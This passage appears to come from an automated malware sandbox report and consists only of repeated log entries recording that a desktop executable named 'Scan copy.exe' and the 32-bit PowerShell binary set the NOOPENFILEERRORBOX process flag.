Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
